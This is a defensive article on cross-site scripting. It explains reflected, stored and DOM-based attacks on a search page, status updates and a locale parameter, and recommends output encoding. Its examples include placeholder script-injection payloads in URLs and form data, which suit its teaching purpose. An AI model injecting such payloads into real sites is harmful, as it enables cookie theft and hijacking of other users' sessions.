Ah here's that problem again, but a bit different. One more try and I bet you get it.
What's the name of the array you are assigning to? Is it "Student" or is that the name of the class? Hmmm...
mike hengst
Ranch Hand
Joined: Oct 19, 2002
Posts: 43
posted
Oct 25, 2002 14:49:00
0
Thanks for the help. I think I am very close. I better be I have to be done with by midnight.
I will post my code for you to digest when I have it complete. Everything compiles now but am having a slight array out of bounds issue. Again thanks.
I agree. Here's the link:
subject: not a statement
Similar Threads
Converting Chars to Strings
Why can student[x] be resolved?
displaying the number of times a page has ever been accessed
school computer won't compile my code
[JTable] Keep row color when sorting
All times are in JavaRanch time: GMT-6 in summer, GMT-7 in winter
JForum
|
Paul Wheaton | http://www.coderanch.com/t/392707/java/java/statement | CC-MAIN-2014-15 | refinedweb | 973 | 61.87 |
This tutorial is for Python 2.6 (it can also be used with other Python 2.x versions).
Other resources
- Python Home Page
- Python Documentation
- Python Tutorial for Programmers
- LaTeX, PDF, Postscript, and Zip versions
See also chapter The End for some more comments.
Intro
First things first
So, you've never programmed before. As we go through this tutorial, I will attempt to teach you how to program. There really is only one way to learn to program. You must read code and write code (as computer programs are often called). I'm going to show you lots of code. You should type in code that I show you to see what happens. Play around with it and make changes. The worst that can happen is that it won't work. When I type in code it will be formatted like this:
# Python is easy to learn
print "Hello, World!"
If the computer prints something out it will be formatted like this:
Hello, World!
(Note that printed text goes to your screen, and does not involve paper. Before computers had screens, the output of computer programs would be printed on paper.)
If you try this program out and you get a syntax error, check which version of Python you have. If you have Python 3.0, you should be using the Non-Programmer's Tutorial for Python 3.0; this tutorial was made for Python 2.6.
There will often be a mixture of the text you type (which is shown in bold) and the text the program prints to the screen, which would look like this:
Halt! Who Goes there? Josh You may pass, Josh
(Some of the tutorial has not been converted to this format. Since this is a wiki, you can convert it when you find it.)
I will also introduce you to the terminology of programming - for example, that programming is often referred to as coding. This will not only help you understand what programmers are talking about, but also help the learning process.
Now, on to more important things. In order to program in Python you need the Python software. If you don't already have the Python software go to and get the proper version for your platform. Download it, read the instructions and get it installed.
Installing Python
For Python programming you need a working Python installation and a text editor. Python comes with its own editor IDLE, which is quite nice and totally sufficient for the beginning. As you get more into programming, you will probably switch to some other editor like emacs, vi or another.
The Python download page is. The most recent version is 3.1, but any Python 2.x version since 2.2 will work for this tutorial. Be careful with Python 3, though, as some major details changed and will break this tutorial's examples. A version of this tutorial for Python 3 is at Non-Programmer's Tutorial for Python 3. There are various different installation files for different computer platforms available on the download site. Here are some specific instructions for the most common operating systems:
Linux, BSD and Unix users
You are probably lucky and Python is already installed on your machine. To test it, type python on a command line. If you see something like the interpreter banner shown in the Interactive Mode section below, you are set.
If you have to install Python, just use the operating system's package manager or go to the repository where your packages are available and get Python. Alternatively, you can compile Python from scratch after downloading the source code. If you get the source code make sure you compile in the Tk extension if you want to use IDLE.
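For example, a quick check from the shell might look like this. Note the command name is an assumption: on the Python 2 systems this tutorial targets it is plain python, while on many modern systems it is python3.

```shell
# Print the interpreter's version; "python3" is an assumption here --
# on the Python 2 systems this tutorial targets, the command is "python".
python3 --version
```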
Mac users
Starting from Mac OS X (Tiger), Python ships by default with the operating system, but you might want to update to the newer version (check the version by starting python in a command line terminal). Also IDLE (the Python editor) might be missing in the standard installation. If you want to (re-)install Python, have a look at the Mac page on the Python download site.
Windows users
Some computer manufacturers pre-install Python. To check if you already have it installed, open a command prompt (cmd in the Run menu) or MS-DOS and type python. If it says "Bad command or file name" you will need to download the appropriate Windows installer (the normal one, if you do not have a 64-bit AMD or Intel chip). Start the installer by double-clicking it and follow the procedure. Python for Windows can be downloaded from the official Python site.
Interactive Mode
Go into IDLE (also called the Python GUI). You should see a window that has some text like this:
Python 2.5.1 (r251:54863, Apr 18 2007, 08:51:08)
IDLE 1.2.1
>>>

The >>> is Python's prompt: it tells you that Python is in interactive mode and is waiting for you to type something. In interactive mode what you type is run immediately, which makes it a handy place to experiment. Whenever you need to play with new Python statements, go into interactive mode and try them out.
Creating and Running Programs
Go into IDLE if you are not already. In the menu at the top, select File then New Window. In the new window that appears, type the following:

print "Hello, World!"

Now save the program: select File from the menu, then Save. Save it as "hello.py" (you can save it in any folder you want). Now that it is saved, it can be run.

Next run the program by going to Run then Run Module (or if you have an older version of IDLE use Edit then Run script). This will output Hello, World! on the *Python Shell* window.
For a more in-depth introduction to IDLE, a longer tutorial with screenshots can be found at
Running Python Programs in Unix
If you are using Unix (such as Linux, Mac OS X, or BSD), you can make the program executable with chmod and put as its first line:

#!/usr/bin/env python2

You can then run the program with ./hello.py like any other command.
Note: In some computer environments, you need to write:
#!/usr/bin/env python
Example for Solaris:
#!/usr/bin/python
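Putting these steps together, a hypothetical shell session could look like the following. The python3 interpreter name is an assumption for modern systems; with this tutorial's Python 2 you would write python or python2 in the shebang line, as shown above.

```shell
# Hypothetical session: create hello.py, mark it executable, run it.
# "python3" in the shebang is an assumption for modern systems; the
# tutorial's Python 2 setups would use "python" or "python2" instead.
printf '#!/usr/bin/env python3\nprint("Hello, World!")\n' > hello.py
chmod +x hello.py
./hello.py
```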
Program file names
It is very useful to stick to some rules regarding the file names of Python programs. Otherwise some things might go wrong unexpectedly. These don't matter as much for programs, but you can have weird problems if you don't follow them for module names (modules will be discussed later).
- Always save the program with the extension .py. Do not put another dot somewhere else in the file name.
- Only use standard characters for file names: letters, numbers, dash (-) and underscore (_).
- White space (" ") should not be used at all (e.g. use underscores instead).
- Do not use anything other than a letter (particularly no numbers!) at the beginning of a file name.
- Do not use "non-english" characters (such as ä, ö, ü, å or ß) in your file names, or, even better, do not use them at all when programming.
Using Python from the command line
If you don't want to use Python from the command line, you don't have to, just use IDLE. To get into interactive mode just type
python without any arguments. To run a program, create it with a text editor (Emacs has a good Python mode) and then run it with
python program_name.
Additionally, to use Python within Vim, you may want to visit Using vim as a Python IDE
Where to get help
At some point in your Python career you will probably get stuck and have no clue about how to solve the problem you are supposed to work on. This tutorial only covers the basics of Python programming, but there is a lot of further information available.
Python documentation
First of all, Python is very well documented. There might even be copies of these documents on your computer, which came with your Python installation:

- The official Python Tutorial by Guido van Rossum is often a good starting point for general questions.
- For questions about standard modules (you will learn what this is later), the Python Library Reference is the place to look.
- If you really want to get to know something about the details of the language, the Python Reference Manual is comprehensive but quite complex for beginners.
Python user community
There are a lot of other Python users out there, and usually they are nice and willing to help you. This very active user community is organised mostly through mailing lists and a newsgroup:
- The tutor mailing list is for folks who want to ask questions regarding how to learn computer programming with the Python language.
- The python-help mailing list is python.org's help desk. You can ask a group of knowledgeable volunteers questions about all your Python problems.
- The Python newsgroup comp.lang.python (Google groups archive) is the place for general Python discussions, questions and the central meeting point of the community.
In order not to reinvent the wheel and discuss the same questions again and again, people will appreciate it very much if you do a web search for a solution to your problem before contacting these lists!
Talking to humans (and other intelligent beings)
Often in programming you are doing something complicated and may not in the future remember what you did. When this happens, the program should probably be commented. A comment is a note to you and other programmers explaining what is happening. For example:
# Not quite PI, but an incredible simulation
print 22.0 / 7.0
# 355/113 is an even more incredible rational approximation to PI
print 355.0 / 113.0
print 22.0 / 7.0 # Well, just a good approximation
Examples
Count to 10
While loops.
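The example that belonged under this heading appears to have been lost; a minimal count-to-10 while loop in the tutorial's spirit might look like the sketch below (written with the parenthesized print(...) form so it runs under both Python 2 and 3; the variable name a is my choice):

```python
# Reconstruction sketch -- not the tutorial's original listing.
a = 0                # start counting at zero
while a < 10:        # keep looping while a is below 10
    a = a + 1
    print(a)         # prints 1 through 10, one number per line
```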
Decisions
If statement
As always I believe I should start each chapter with a warm-up typing exercise, so here is a short program to compute the absolute value of a number:
n = input("Number? ")
if n < 0:
    print "The absolute value of", n, "is", -n
else:
    print "The absolute value of", n, "is", n
Here is the output from the two times that I ran this program:
Number? -34 The absolute value of -34 is 34
Number? 1
The absolute value of 1 is 1

So what does the computer do when it sees this code? First it asks the user for a number with the line n = input("Number? "). Then it reads the line if n < 0:. If n is less than zero, Python runs the line print "The absolute value of", n, "is", -n. Otherwise it runs the line print "The absolute value of", n, "is", n.
More formally, Python looks at whether the expression n < 0 is true or false. An if statement is followed by an indented block of statements that are run when the expression is true. Optionally, after the if statement is an else statement and another indented block of statements. This second block of statements is run if the expression is false.
There are a number of different tests that an expression can have. Here is a table of all of them:

<     less than
<=    less than or equal to
>     greater than
>=    greater than or equal to
==    equal to
!=    not equal to

Notice that the equality test is written with two equal signs (==); a single equal sign (=) assigns a value instead.
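As a quick illustration of these tests (the values 5 and 8 are my own, not from the original text), each comparison evaluates to True or False:

```python
# Demonstration of the comparison tests; the example values are invented.
a = 5
b = 8
print(a < b)    # a less than b            -> True
print(a <= 5)   # a less than or equal to 5 -> True
print(a > b)    # a greater than b          -> False
print(a >= b)   # a greater or equal to b   -> False
print(a == b)   # a equal to b              -> False
print(a != b)   # a not equal to b          -> True
```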
Another feature of the if command is the elif statement. It stands for "else if" and means: if the original if statement is false but the elif expression is true, then run the elif block. If neither the if nor the elif expressions are true, then run what's in the else block. There can be more than one elif expression, allowing multiple tests to be done in a single if statement.
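The original example appears to be missing here; the following sketch (with invented scores and cutoffs, and the parenthesized print(...) form that works in both Python 2 and 3) shows one if, one elif, and an else working together:

```python
# Hypothetical example, not the tutorial's original listing.
score = 77
if score >= 90:          # first test
    grade = "A"
elif score >= 70:        # only checked if the first test was false
    grade = "B"
else:                    # runs if neither test above was true
    grade = "C or below"
print("The grade is " + grade)
```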
Examples
# This program demonstrates the use of the == operator
# using numbers
print 5 == 6
# using variables
x = 5
y = 8
print x == y
And the output
False False
High_low.py
# Plays the guessing game higher or lower
# This should actually be something that is semi random like the
# last digits of the time or something else, but that will have to
# wait till a later chapter. (Extra Credit, modify it to be random
# after the Modules chapter)
number = 7
guess = -1

while guess != number:
    guess = input("Guess a number: ")
    if guess > number:
        print "Too high"
    elif guess < number:
        print "Too low"

print "Just right"

average.py

# keeps asking for numbers until 0 is entered.
# Prints the average value.
count = 0
sum = 0.0
number = 1  # set to something that will not exit the while loop immediately
print "Enter 0 to exit the loop"
while number != 0:
    number = input("Enter a number: ")
    count = count + 1
    sum = sum + number
count = count - 1  # take off one for the last number
print "The average was:", sum / count
Sample runs:
Enter 0 to exit the loop Enter a number: 3 Enter a number: 5 Enter a number: 0 The average was: 4.0
Enter 0 to exit the loop Enter a number: 1 Enter a number: 4 Enter a number: 3 Enter a number: 0 The average was: 2.66666666667
average2.py
# keeps asking for numbers until count numbers have been entered.
# Prints the average value.
sum = 0.0
print "This program will take several numbers then average them"
count = input("How many numbers would you like to average: ")
current_count = 0
while current_count < count:
    current_count = current_count + 1
    print "Number", current_count
    number = input("Enter a number: ")
    sum = sum + number
print "The average was:", sum / count
Sample runs:
This program will take several numbers then average them How many numbers would you like to average: 2 Number 1 Enter a number: 3 Number 2 Enter a number: 5 The average was: 4.0
This program will take several numbers then average them How many numbers would you like to average: 3 Number 1 Enter a number: 1 Number 2 Enter a number: 4 Number 3 Enter a number: 3 The average was: 2.66666666667
Exercises
- b > 0: elif: print("ok") print("Nope")()
Advanced Functions Example
Some people find this section useful, and some find it confusing. If you find it confusing you can skip it (or just look at the examples.) Now we will do a walk through for the following program:
def mult(a, b):
    if b == 0:
        return 0
    rest = mult(a, b - 1)
    value = a + rest
    return value

print "3 * 2 = ", mult(3, 2)
3 * 2 = 6
Basically this program creates a positive integer multiplication function (that is far slower than the built-in multiplication operator) and then demonstrates this function by using it. The program demonstrates recursion, a form of iteration (repetition) in which a function repeatedly calls itself until an exit condition is satisfied. It uses repeated additions to give the same result as multiplication: e.g. 3 + 3 (addition) gives the same result as 3 * 2 (multiplication).
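To make the repeated additions visible, here is a hypothetical traced variant of mult. The depth parameter and the printing are my additions, not part of the program above, and the parenthesized print(...) form is used so the sketch runs under both Python 2 and 3.

```python
# Traced version of mult -- "depth" is added only to indent the output
# so you can see how deep the recursion has gone.
def mult(a, b, depth=0):
    print("  " * depth + "mult(%d, %d)" % (a, b))
    if b == 0:
        return 0
    rest = mult(a, b - 1, depth + 1)  # recursive call, one level deeper
    return a + rest

print("3 * 2 = %d" % mult(3, 2))
```

Running it prints each call (mult(3, 2), then mult(3, 1), then mult(3, 0)) before the final result, which mirrors the walkthrough that follows.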
RUN 1
- Question: What is the first thing the program does?
- Answer: The first thing done is the function mult is defined with all the lines except the last one.
def mult(a, b):
    if b == 0:
        return 0
    rest = mult(a, b - 1)
    value = a + rest
    return value
- This creates a function that takes two parameters and returns a value when it is done. Later this function can be run.
- What happens next?
- The next line after the function,
print "3 * 2 = ", mult(3, 2)is run.
- And what does this do?
- It prints
3 * 2 =and the return value of
mult(3, 2)
- And what does
mult(3, 2)return?
- We need to do a walkthrough of the
multfunction to find out.
RUN 2
- What happens next?
- The variable
agets the value 3 assigned to it and the variable
bgets the value 2 assigned to it.
- And then?
- The line
if b == 0:is run. Since
bhas the value 2 this is false so the line
return 0is skipped.
- And what then?
- The line
rest = mult(a, b - 1)is run. This line sets the local variable
restto the value of
mult(a, b - 1). The value of
ais 3 and the value of
bis 2 so the function call is
mult(3,1)
- So what is the value of
mult(3, 1)?
- We will need to run the function
multwith the parameters 3 and 1.
def mult(3, 2): if b == 0: return 0 rest = mult(3, 2 - 1) rest = mult(3, 1) value = 3 + rest return value
RUN 3
- So what happens next?
- The local variables in the new run of the function are set so that
ahas the value 3 and
bhas the value 1. Since these are local values these do not affect the previous values of
aand
b.
- And then?
- Since
bhas the value 1 the if statement is false, so the next line becomes
rest = mult(a, b - 1).
- What does this line do?
- This line will assign the value of
mult(3, 0)to rest.
- So what is that value?
- We will have to run the function one more time to find that out. This time
ahas the value 3 and
bhas the value 0.
- So what happens next?
- The first line in the function to run is
if b == 0:.
bhas the value 0 so the next line to run is
return 0
- And what does the line
return 0do?
- This line returns the value 0 out of the function.
- So?
- So now we know that
mult(3, 0)has the value 0. Now we know what the line
rest = mult(a, b - 1)did since we have run the function
multwith the parameters 3 and 0. We have finished running
mult(3, 0)and are now back to running
mult(3, 1). The variable
restgets assigned the value 0.
- What line is run next?
- The line
value = a + restis run next. In this run of the function,
a = 3and
rest = 0so now
value = 3.
- What happens next?
- The line
return valueis run. This returns 3 from the function. This also exits from the run of the function
mult(3, 1). After
returnis called, we go back to running
mult(3, 2).
- Where were we in
mult(3, 2)?
- We had the variables
a = 3and
b = 2and were examining the line
rest = mult(a, b - 1).
- So what happens now?
- The variable
restget 3 assigned to it. The next line
value = a + restsets
valueto
3 + 3or 6.
- So now what happens?
- The next line runs, this returns 6 from the function. We are now back to running the line
print "3 * 2 = ", mult(3, 2)which can now print out the 6.
- What is happening overall?
- Basically we used two facts to calculate the multiple of the two numbers. The first is that any number times 0 is 0 (
x * 0 = 0). The second is that a number times another number is equal to the first number plus the first number times one less than the second number (
x * y = x + x * (y - 1)). So what happens is
3 * 2is first converted into
3 + 3 * 1. Then
3 * 1is converted into
3 + 3 * 0. Then we know that any number times 0 is 0 so
3 * 0is 0. Then we can calculate that
3 + 3 * 0is
3 + 0which is
3. Now we know what
3 * 1is so we can calculate that
3 + 3 * 1is
3 + 3which is
6.
This is how the whole thing works:
3 * 2 3 + 3 * 1 3 + 3 + 3 * 0 3 + 3 + 0 3 + 3 6
Should you still have problems with this example, look at the process backwards. What is the last step that happens? We can easily make out that the result of
mult(3, 0) is
0. Since
b is
0, the function
mult(3, 0) will return
0 and stop.
So what does the previous step do?
mult(3, 1) does not return
0 because
b is not
0. So the next lines are executed:
rest = mult (a, b - 1), which is
rest = mult (3, 0), which is
0 as we just worked out. So now the variable
rest is set to
0.
The next line adds the value of
rest to
a, and since
a is
3 and
rest is
0, the result is
3.
Now we know that the function
mult(3, 1) returns
3. But we want to know the result of
mult(3,2). Therefore, we need to jump back to the start of the program and execute it one more round:
mult(3, 2) sets
rest to the result of
mult(3, 1). We know from the last round that this result is
3. Then
value calculates as
a + rest, i. e.
3 + 3. Then the result of 3 * 2 is printed as 6.
The point of this example is that the function
mult(a, b) starts itself inside itself. It does this until
b reaches
0 and then calculates the result as explained above.
Recursion
Programming constructs of this kind are called recursive and probably the most intuitive definition of recursion is:
- Recursion
- If you still don't get it, see recursion.
These last two sections were recently written. If you have any comments, found any errors or think I need more/clearer explanations please email. I have been known in the past to make simple things incomprehensible. If the rest of the tutorial has made sense, but this section didn't, it is probably my fault and I would like to know. Thanks.
Examples
countdown.py
def count_down(n): print n if n > 0: return count_down(n-1) count_down(5)
Output:
5 4 3 2 1 0
Commented_mult.py
# The comments below have been numbered as steps, to make explanation # of the code easier. Please read according to those steps. # (step number 1, for example, is at the bottom) def mult(a, b): # (2.) This function will keep repeating itself, because.... if b == 0: return 0 rest = mult(a, b - 1) # (3.) ....Once it reaches THIS, the sequence starts over again and goes back to the top! value = a + rest return value # (4.) therefore, "return value" will not happen until the program gets past step 3 above print "3 * 2 = ", mult(3, 2) # (1.) The "mult" function will first initiate here # The "return value" event at the end can therefore only happen # once b equals zero (b decreases by 1 everytime step 3 happens). # And only then can the print command at the bottom be displayed. # See it as kind of a "jump-around" effect. Basically, all you # should really understand is that the function is reinitiated # WITHIN ITSELF at step 3. Therefore, the sequence "jumps" back # to the top.
Commented_factorial.py
# Another "jump-around" function example: def factorial(n): # (2.) So once again, this function will REPEAT itself.... if n <= 1: return 1 return n * factorial(n - 1) # (3.) Because it RE-initiates HERE, and goes back to the top. print "2! =", factorial(2) # (1.) The "factorial" function is initiated with this line print "3! =", factorial(3) print "4! =", factorial(4) print "5! =", factorial(5)
Commented_countdown.py
# Another "jump-around", nice and easy: def count_down(n): # (2.) Once again, this sequence will repeat itself.... print n if n > 0: return count_down(n-1) # (3.) Because it restarts here, and goes back to the top count_down(5) # (1.) The "count_down" function initiates here # First get the test questions # Later this will be modified to use file io. def get_questions(): # notice how the data is stored as a list of lists return [["What color is the daytime sky on a clear day? ", "blue"], ["What is"]] # # go to the next question index = index + 1 # notice the order of the computation, first multiply, then divide print ("You got", right * 100 / len(questions), "% right out of", len
for good for? The first use is to go through all the elements of a list and do something with each of them. Here's a quick way to add up all the elements:
list = [2, 4, 6, 8] sum = 0 for num in list: sum = sum + num print "The sum\tl:", l l.sort() print "l.sort()", "\t\tl:", l prev = l[0] print "prev = l[0]", "\t\tprev:", prev del l[0] print "del l[0]", "\t\tl:", l for item in l: if prev == item: print "Duplicate of", prev, "found" print "if prev == item:", "\t.
Using Modules
Here's this chapter's typing exercise (name it cal.py).
import actually looks for a file named calendar.py and reads it in. If the file is named calendar.py and it sees an "import calendar" it tries to read in itself which works poorly at best.)): Decisions to use = input ("Guess a number: ") if guess > number: print "Too high" elif guess < number: print "Too low" print "Just right"
More on Lists a integer. There is also a similar function called
float() that will convert
# IO
Now modify the grades program from section Dictionaries so that it uses file IO to keep a record of the students.
Now modify the grades program from section Dictionaries so that it uses file IO()..
- Question:.
License
The Non-Programmer's Tutorial for Python is licensed under the GNU Free Documentation License. All programming examples in the text are granted to the public domain.. | http://en.wikibooks.org/wiki/Non-Programmer's_Tutorial_for_Python_2.6/Print_version | CC-MAIN-2015-11 | refinedweb | 4,022 | 73.17 |
Bummer! This is just a preview. You need to be signed in with a Basic account to view the entire video. last video, we used a design pattern to build a service registry and
- 0:05
I mentioned that we'd circle back to it.
- 0:06
Well, here we are.
- 0:08
This pattern, called the Builder Pattern, is used to address a few common pit falls.
- 0:14
Mainly, the one of classes that have many fields.
- 0:17
Creating an object is accomplished by calling the classes constructor.
- 0:21
But, if the class has five instance feilds, like ours does.
- 0:25
We might end up with a constructor that has five perameters.
- 0:29
But the code that we type to instantiate an object with
- 0:31
five perimeters isn't that readable.
- 0:34
And what if we want to be able to create an object,
- 0:36
while specifying only a couple field values?
- 0:39
Well, I guess we need a constructor, but
- 0:42
the order of that parameter list may not be so obvious either.
- 0:46
So, we arrive at the builder pattern.
- 0:48
Using this pattern,
- 0:49
we're able to create readable code that's intuitive and easy to use.
- 0:53
To see how this is done, let's do this for our contact class now.
- 0:58
To demonstrate what we'd like to avoid, I'll use similar code here.
- 1:01
It's what we used earlier in the course to construct a sample contact object.
- 1:06
So, I'll create a contact, I'll name it contact.
- 1:09
And I will call a constructor that doesn't really exist but
- 1:12
let's pretend that it does.
- 1:13
I'll pass my first name, last name, email address.
- 1:21
And a phone number 773-555-6666.
- 1:22
Now if we had coded this
- 1:28
constructor in a contact class, as we did in workspaces earlier in the course.
- 1:32
We might remember the order of our four parameters or
- 1:35
we could pop open the source code to see.
- 1:37
Still, this would require an extra step that draws attention to the fact that our
- 1:41
code isn't as readable as it should be.
- 1:43
Even more, what if the contact class came from a jar file we've included in our
- 1:47
project and we don't have access to the source code?
- 1:50
For those reasons and
- 1:51
others, many developers choose the builder pattern to address concerns.
- 1:55
Wouldn't it be much more intuitive and
- 1:57
readable if our code coud look like this instead?
- 2:01
So, I'll create a contact and
- 2:03
builder object to specify something that we feel our users would know.
- 2:08
The first name and the last name and then, I'll put this on a separate line for
- 2:12
readability.
- 2:13
On that object, I could call a withEmail method and specify my email address.
- 2:22
And with that return value, I could call a withPhone method and
- 2:26
specify the phone number.
- 2:31
And that should be a long, not a string.
- 2:34
And finally, I'd call a build method to build my final contact object.
- 2:40
And actually, without too much effort, our code could look like this.
- 2:45
So, let's head over to contact.java to see how we can accomplish this.
- 2:51
The first thing we'll need to do is, add a contact builder class.
- 2:54
And though we could create this in a separate file,
- 2:56
we can also embed a static class in the contact class.
- 2:59
So for simplicity here in this course, that's what we'll do and
- 3:03
I will do this at the bottom.
- 3:05
Public, static, class, contact, builder.
- 3:12
We'll need a field in this class for
- 3:14
each of the contact fields we want our builder to configure.
- 3:17
So let's add those now.
- 3:18
I'll scroll up, and copy and paste the four that I'm interested in.
- 3:22
From above, so I'm interested in these four, right here.
- 3:27
So, I'll paste those right here and I'll remove my JPA annotations.
- 3:39
Great, now the contact builder constructor will contain
- 3:42
the two fields that are required.
- 3:44
And then, we might assume everyone will get right away, the first name and
- 3:48
the last name.
- 3:49
Of course, this assumption could certainly be up for debate.
- 3:52
Let's create that constructor now, public contactBuilder.
- 3:59
And in there, I'll specify the first name and the last name.
- 4:05
And this like any other constructor, will initialize its fields.
- 4:15
And now, we get to add those handy readable methods that we so desired.
- 4:19
Here is the withEmail method.
- 4:22
I going to declare it as a public ContactBuilder method withEmail and
- 4:27
as a parameter, we specify the email address.
- 4:32
Now this method is sort of like a setter, in that,
- 4:35
we set a field using a given parameter value.
- 4:38
But, there's one glaring difference, which makes this builder pattern so
- 4:43
attractive and that is the return value.
- 4:46
Notice that we're returning a contact builder object here and
- 4:50
the return value is this.
- 4:53
The object on which the method was called, a contact builder object.
- 4:57
This is the part that allows us to chain method calls.
- 5:00
If I pop back over to application.java, I see these chain method calls.
- 5:05
I create a contact builder and on that builder, I create with email and
- 5:09
I chain that to a withPhone call and finally a buildCall.
- 5:17
So in a similar fashion, let's now code the withPhone method.
- 5:22
So below the withEmail, I'll create a public ContactBuilder method.
- 5:27
Call it withPhone, and as a parameter, I'll include a long
- 5:33
and again, like a setter, we will set the field using the parameter value.
- 5:39
Except that we, as opposed to a setter,
- 5:42
will return a contact builder object, this.
- 5:46
Now the final method we need to create in this class, is the build method.
- 5:50
So to do that,
- 5:51
this one will create the contact object that we are after in the end.
- 5:56
I'll call this build and we'll return a new contact object and
- 6:02
give the contact constructor a reference to this object.
- 6:07
And I can't forget to create the object by using the new keyword.
- 6:12
Now, since we don't have a constructor that accepts a contact builder
- 6:15
object as a parameter, we need to create that as well.
- 6:18
So, we'll scroll up here and create that.
- 6:21
I'll do that after my default constructor that I listed here.
- 6:24
Public contact and this will accept a contact builder object here.
- 6:29
I'll just name it builder as the parameter name.
- 6:32
And in this constructor,
- 6:33
we'll initialize all the contact fields with the builder field values.
- 6:38
So to do that, I'll start with this.firstName pools builder.firstName,
- 6:46
this.lastName Equals builder.lastname.
- 6:51
This.email equals builder.email, and
- 6:56
this.phone equals builder.phone and there you have it.
- 7:03
If you want to prove this works in application.java,
- 7:06
you can print the contact object to standard out and run the application.
- 7:10
Now, I see that I'm missing an import statement here, so I'll go ahead and
- 7:14
import that.
- 7:15
If you get this prefix of Contact.ContactBuilder,
- 7:19
that is because ContactBuilder is a static class in the contact class.
- 7:25
If you don't want your code to look like this,
- 7:28
you can simply alter the import statement above.
- 7:31
You can, in addition to importing this class,
- 7:35
you can import ContactBuilder explicitly.
- 7:40
So below this initialization of the contact object,
- 7:44
I can simply display the contact object.
- 7:47
Which willll call that objects to string method, which we included in our class.
- 7:53
Before I run this, I'm going to comment out the session factor.
- 7:56
Since we don't want to initialize all that hibernating functionality quite yet.
- 8:02
So with that commented out, I'm going to right click application and
- 8:06
choose run and let's see what our output contains.
- 8:11
There are the results of the Contact's two string method, I see I got an ID of zero.
- 8:16
That will be the default value of that long field.
- 8:20
As well as a first name, last name, email address and phone number that I specified.
- 8:25
It looks like our builder pattern worked.
- 8:30
Now you've seen the builder pattern.
- 8:32
Which is often used for objects that involve complex and
- 8:35
otherwise, unintuitive configuration.
- 8:38
For more on Java design patterns, check the teacher's notes.
- 8:42
But now back to our regularly scheduled hibernate program. | https://teamtreehouse.com/library/hibernate-basics/getting-started-with-hibernate/the-builder-design-pattern | CC-MAIN-2019-43 | refinedweb | 1,646 | 82.75 |
I use ST for R development. A popular package called roxygen (roxygen.org/) provides a way to document functions inline so it makes it super easy to generate final documentation when packaging a set of functions. I was wondering if someone could give me advice on how I would write a ST plugin to generate documentation templates. Here is an example:
Let's say I have a simple function like so:
test_function <- function(a,b)
{
a+b
}
then, the (basic) roxygen markup for this functions would look like so:
#'
#' <description>
#' @param a <description>
#' @param b <description>
test_function <- function(a,b)
{
a+b
}
I would like to write a plugin (or macro if that's what it would be called in this context) to automatically generate the template. I select the function and it could automatically generate the above based on what's in the function(....)
Note that the is just (my) place holder to indicate that one could (but does not have to) describe what that parameter (or function in the case of the top most line) does.
Ideas or suggestions?
thanks.
Sublime Text 2 uses python for its plugins. If you don't know python, it's very easy to learn. Here's st2's api for some help:
What you're asking for is very simple. I'll make it for you if you'd like. Just give me a couple minutes.
Here it is. Just click Tools > New Plugin. Replace the template with this:
import sublime, sublime_plugin
class RDocsCommand(sublime_plugin.TextCommand):
def run(self, edit):
sel = self.view.sel()[0]
params_reg = self.view.find('(?<=\().*(?=\))', sel.begin())
params_txt = self.view.substr(params_reg)
params = params_txt.split(',')
snippet = "#'\n#' <description>\n"
for p in params:
snippet += "#' @param %s <description>\n" % p
self.view.insert(edit, sel.begin(), snippet)[/code]
Then you have to add the keybinding to activate it. Open the command palette and type: "User Keybindings." Add the following to your keybindings: [code] { "keys": "super+shift+alt+r"], "command": "r_docs", "context":
{ "key": "selection_empty", "operator": "equal", "operand": false, "match_all": true },
{
"operand": "source.r",
"operator": "equal",
"match_all": true,
"key": "selector"
}
]
}
Note: you can change the "keys" value to whatever you want.
Usage: your function must be selected (actually only the first line needs to be selected) for this to work. Just press your keybinding to activate.
Perfect, thanks. I just started learning python on Monday so I am looking forward to contributing my own shortly. There is a syntax error with your keybinding code snippet that I can't get ST to accept. I'll play around to figure that out.
You most likely need to add a comma to any keybinding before or add a comma if there is a binding after since I just copied and pasted it from my keybindings (where it worked).
Commas kill...
Fixed and works beautifully. Thanks so much! | https://forum.sublimetext.com/t/plugin-for-generating-documentation-template-for-r/4081 | CC-MAIN-2017-39 | refinedweb | 474 | 66.64 |
XSS Prevention Cheatsheet
How to prevent XSS in Java, Python, Node.js, C#, Go, and Scala
Join the DZone community and get the full member experience.Join For Free
XSS, or Cross-Site Scripting, is one of the most common vulnerabilities found in applications. In bug bounty programs of different organizations, XSS consistently ranks as the most common vulnerability found. Today, let’s learn how these attacks work, how they manifest in code, and how to prevent them in your programming language. Let’s dive right in!
Anatomy of an XSS attack
XSS happens whenever an attacker can execute malicious scripts on a victim’s browser.
Applications often use user input to construct web pages. For example, a site might have a search functionality where the user can input a search term, and the search results page will include the term at the top of the results page. If a user searches “abc”, the source code for that page might look like this:
<h2>You searched for abc; here are the results!</h2>
But what if that application cannot tell the difference between user input and the legitimate code that makes up the original web page?
Attackers might be able to submit executable scripts and get that script embedded on a victim’s webpage. These malicious scripts can be used to steal cookies, leak personal information, change site contents, or redirect the user to a malicious site. There are three main types of XSS attacks: reflected XSS, stored XSS, and DOM XSS.
Reflected XSS
For example, if the application also allows users to search via URLs:
If an attacker can trick victims into visiting this URL:
some malicious script</script>
The script in the URL will become embedded in the page the victim is visiting, making the victim’s browser run the JS code contained within the
<script> tags. This is called a “reflected XSS” attack.
<h2>You searched for <script> some malicious script</script>; here are the results!</h2>
Stored XSS
During a stored XSS attack, the attacker places the malicious script into a database before it gets returned to the victim. Let’s say that example.com also allows users to post status updates for others to see. An attacker can post this status update:
POST /status/updatestatus=<script> some malicious script </script>
This malicious script will become embedded on the attacker’s profile page, attacking anyone who visits the attacker’s profile page.
DOM XSS
Finally, DOM-based XSS is similar to reflected XSS, except that in DOM-based XSS, the user input never leaves the user’s browser. Since the malicious input is never sent to the server, this type of XSS is harder to detect and prevent.
As in reflected XSS, attackers submit DOM-based XSS payloads via the victim’s user input. Unlike reflected XSS, a DOM-based XSS script doesn’t require server involvement, because it executes when user input modifies the source code of the page in the browser directly. Say a website allows the user to change their locale by submitting it via a URL parameter:
The URL parameter isn’t submitted to the server. Instead, it’s used to change the language of the webpage by a client-side script of the application. But if the website doesn’t validate the user-submitted parameter, an attacker can trick victims into visiting a URL like this one:
some malicious script </script>
The site will embed the payload on the user’s web page, and the victim’s browser will execute the malicious script.
Defeating XSS
The key to preventing XSS is output encoding. You should never insert user-submitted data directly into an HTML document. Instead, you should encode any untrusted input that ends up on an HTML page so that browsers know the input should be treated as content and not raw HTML. This will make sure that attackers cannot influence the way browsers interpret the information on the page by submitting dangerous characters or character sequences. For example, if someone submits
<script>alert(1)</script>, browsers should treat
<script> and
</script> as user content, not HTML script tags.
